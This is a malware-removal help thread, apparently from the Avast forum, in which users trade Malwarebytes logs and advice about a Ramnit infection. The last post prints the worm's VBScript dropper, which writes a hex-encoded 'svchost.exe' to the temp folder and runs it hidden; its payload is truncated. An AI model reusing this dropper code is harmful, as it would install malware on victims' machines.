vbs:exedropper-gen[trj] and win32:ramnit-b

[scoobertina]

I rescanned.. and here you go.. I have to go to work.. so I will check in when I return home..

thanks for all the help.. I am a bit of a novice here..

Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4494

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

8/28/2010 2:03:01 PM
mbam-log-2010-08-28 (14-03-01).txt

Scan type: Full scan (C:\|)
Objects scanned: 267873
Time elapsed: 2 hour(s), 0 minute(s), 33 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 8
Registry Values Infected: 0
Registry Data Items Infected: 2
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{f02fabcb-92dd-475a-98af-14217bd50746} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{0ed403e8-470a-4a8a-85a4-d7688cfe39a3} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{f02fabcb-92dd-475a-98af-14217bd50746} (Adware.Gamevance) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{1d4db7d2-6ec9-47a3-bd87-1e41684e07bb} (Adware.MyWebSearch) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{af2e62b6-f9e1-4d4f-a10a-9dc8e6dcbcc0} (Adware.VideoEgg) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d} (Rogue.AntiVirus2008) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{f10587e9-0e47-4cbe-abcd-7dd20b862223} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\multimediaControls.chl (Trojan.Zlob) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Trojan.PWS) -> Data: c:\program files\microsoft\desktoplayer.exe -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (Hijack.UserInit) -> Bad: (c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe) Good: (userinit.exe) -> Quarantined and deleted successfully.

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Program Files\Microsoft\DesktopLayer.exe (Trojan.PWS) -> Delete on reboot.

[scoobertina]

well, I have been home for a few hours, and I am not getting the pop ups anymore.. I want to thank safesurf.. I am not sure I am done yet.. but I know I will forget..

so thank you for all the help so far.. and if we are done.. thank you!

Tina

[SafeSurf]

Hi Tina,

So is your machine and Avast working properly now after MBAM quarantined your infections?

[SafeSurf]

To answer your question, no you are not done.

1. Do you have any passwords stored on your machine?  Gaming passwords or any other?  If so, delete the passwords as a precaution.

2. Update and run another MBAM scan and if anything comes up, put them in quarantine.  Copy and paste your log here in this thread.

3. Check the information on the first post of this thread under Virus/Worms for you to check your machine for malware: http://forum.avast.com/index.php?topic=53253.0.  You already did the MBAM part.  Scroll down to the red OTL and download the OTL file, which you need to download to your desktop.  Follow the instructions on the link I just gave you.  Attach 2 (large) OTL log files (located on your desktop) to your next post.  To attach: click "Additional Options" > Attach > browse (desktop) > post (you will need to attach 2 logs to your post).

Let me know if you have any questions.

[lectrotek]

Hi guys,

Looks like this little b*stard is a recent phenomenon.

I have exactly the same problem.

May I just say that this thread has been really helpful

BUT........for me when the trojan had finished tearing through my pc (and when the virus chest was full), I got a 'WINDOWS FILE PROTECTION' pop up saying that 'programs that are required for windows to run properly have been replaced by unrecognised versions...please insert XP CD to restore the original versions'

now this didnt seem to be a problem at this stage, I just ignored the box (did not close it).

When I had finished an avast full system scan (which showed no files infected), I then went on to do a Malwarebytes scan also, as suggested in this thread.

I opened Malwarebytes, clicked on 'update' but there was an error and malware could not update. I then attempted to reopen firefox(with the intention of downloading malwarebytes again from scratch to get the latest definitions) but firefox would not get beyond the 'previous session crashed' pop up.

I then tried IE but this proceeded to start installing itself, presumably a symptom as described by the above 'WINDOWS FILE PROTECTION' box that appeared.

I've no idea what to do now 

I suppose I could do a malwarebytes scan without the updated definitions, but as this is a comparatively new virus I dont know how useful this will be .

Many thanks in advance for any advice you may have

[lectrotek]

i should say at this point that i'm writing this on another pc!

i've found out that i've got an old version of malwarebytes and this is why it wont connect to their server.

I'm downloading the new version and then i'll install it on the infected pc and run a scan.

I'm still very scared about the windows pop up though 

[lectrotek]

Right, I've run an MBAM scan twice. A second time after the avast scan showed no infections. The result of this final scan is:


Malwarebytes' Anti-Malware 1.41
Database version: 2968
Windows 5.1.2600 Service Pack 2 (Safe Mode)

15/10/2009 23:01:08
mbam-log-2009-10-15 (23-01-08).txt

Scan type: Full Scan (C:\|D:\|E:\|)
Objects scanned: 195983
Time elapsed: 1 hour(s), 36 minute(s), 16 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 1
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\{NSINAME} (Trojan.Agent) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
C:\Documents and Settings\Timosee\Start Menu\Programs\UltraVideo (Trojan.DNSChanger) -> Quarantined and deleted successfully.

Files Infected:
(No malicious items detected)

[lectrotek]

At this point i think I'm done. I've changed all my passwords etc.

However, Firefox does not work now.

1) Would this still be a symptom of the active virus do you think?

I was thinking I may have to just uninstall and re-download.

2) Does any one know how I can transfer my bookmarks to the new browser? or are they gone for good?

(after restarting my pc after the 1st MBAM scan, windows booted up fine and I was able to access IE as normal. It's just firefox that seems to be the only casualty)

[lectrotek]

hello, anyone there?! 

[DavidR]

What exactly do you mean by firefox doesn't work now (more detailed information required), doesn't open, opens but doesn't function correctly, displays errors, etc. ?

It could be that the firefox default profile has been corrupted/damaged, etc.
You could try creating a new user profile and see if that works, if not it may be best to download the latest version, uninstall the current installation reboot and reinstall.

http://support.mozilla.com/en-US/kb/Recovering+important+data+from+an+old+profile?s=create+new+profile&as=s

[lectrotek]

What exactly do you mean by firefox doesn't work now (more detailed information required), doesn't open, opens but doesn't function correctly, displays errors, etc. ?

It could be that the firefox default profile has been corrupted/damaged, etc.
You could try creating a new user profile and see if that works, if not it may be best to download the latest version, uninstall the current installation reboot and reinstall.

http://support.mozilla.com/en-US/kb/Recovering+important+data+from+an+old+profile?s=create+new+profile&as=s

Hi David,

Ta for the reply. That link looks very useful.

RE: firefox, when I double click the icon, i get a crash report pop up. when i click 'restore session' the pop up just appears again. If i click 'quit'and then try and reopen firefox from the desktop, again the pop-up appears.

To make things worse, avast has just detected: win32Rootkit.gen (rtk)


Ah to hell with it, I think I'll have to get the pc looked at by a pro. i'm out of my depth.

cheers for the response.   

[SafeSurf]

lectrotek,

The version of MBAM that you used is outdated; the current version is 1.46 and always needs to be updated prior to doing a scan.

I suggest the following before you go out spending money on a Pro:

1. Update MBAM to the current version of 1.46; update the definitions, and run a FULL scan.  Quarantine any infected items.

2. Check the information on the first post of this thread under Virus/Worms for you to check your machine for malware: http://forum.avast.com/index.php?topic=53253.0. 

Follow the directions of obtaining an MBAM log (make sure you update MBAM first) and the OTL logs.  Post the MBAM log here (copy and paste) and the two (2) OTL log as an attachment (Additional Options > Attach > Browse (the logs will be on your desktop > Post).  We can then analyze this in the meantime for any malware, and if any malware is found we will refer you to one of our malware experts. 

Please let us know if you have any additional questions.  Thank you.

[billatthebar]

ok, im new here ive been researching this bloody virus all day and only today downloaded avast blah blah, wasnt to concerned with security before as i am always careful and i use malwarebytes regularly anyway....but i forgot i have a retarded girlfriend LOL but anyway.  i was out on sunday and she txtd me saying bad company 2 wouldnt work any more and that Punkbuster was playing up ( the anti cheat software) so i thought no problem ill have a look....so i ran a scan and found a few infected items which wasnt really like my computer as i like to keep it clean! anyway i fixed and rebooted, and much to my dismay the programs wer still there....so i continued and started researchin wat the hell was wrong with my computer....it turns out i have a process running called 'chrome' that isnt google chrome and is actually the virus workin in the backgorund or a program related to the virus - this program is called 'desktoplayer' and is in the c:\program files\microsoft folder.  its crap and i couldnt delete it until the process was removed - and the process in task manager is only called chrome if you run google chrome! otherwise its called iexplorer or firefox (depending on what browser you use...anyway i got it deleted along with a few other files i searched for under name srv.exe    i used search parameters so that only files found would be created on todays date, and be less taht 100kb (most were around 55kb) and deleted those also.  i downloaded a tool to clean chromes tempoary files and a spyware cleaner, ran malwarebytes updated sevral times and rebooted....every time desktoplayer was back in the folder and for the life of me i cannot remove the little bastard.  its stuck so i downloaded avast antivirus to give it a shot and this is when it really got bad - it turns out that this virus is somethin known as a 'rootkit' or uses a rootkit at least to hide itself from your OS....its a worm and attaches itself to basically every EXE on your computer, as well as a hell of alot of dll files....i know ive had this virus since the 3rd and today is the 5th so taht is 3 days, and ive been told by avast that i hav over 5000 infected files....none of my games work any more and ive caved and have to do a reinstall, im just posting my findings here so that hopefully itll be of some use to somebody, i am rubbish at writing posts however lol...so im backing up whatever pics and music/movies i can recover (as im pretty sure they r unaffected by teh virus) and putting them on an external drive (which also needs formatting as teh worm spreads throuh drives!)  its relatively new i assume and is pretty bad and apparently once your computer is compromised it is no longer safe, and a reinstall of windows is recommended.  there is a trojan that opens back door ports in your computer allowing the hacker to steal passwords and bank details and it has even been advised that you change passwords and details but NOT FROM YOUR AFFECTED COMPUTER!  this has been a headache but nothin too major will be lost from a reinstall so id rather be safe than sorry, just this time i think ill keep avast installed from the start lol... oh yeah the virus also deleted my restore points so performin system restore was out of teh question (the G key is broken on my keyboard so sorry for that) anyway, this is all after hours and hours of reading and trying things myself, ive been at it most of the day and it seems pretty unfixable, bite the bullet and reinstall before you can no longer back up files! dont back up exes or dlls as they are infected. if you want someone to blame, apparently this virus originated in russia - could hav bloody guessed and my computer has ended up like chernoybl anyway lol

thanks hope this helps someone
 

[billatthebar]

by the way, the reason your firefox no longer works is probably because avast has moved infected, essential components of your browser to its chest, so it hasnt got the ability to start!

[billatthebar]

also infects HTML files on your computer adding this visual basic script to the end of each

<script type='text/javascript'>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

wat a menace lol, its very new and very agressive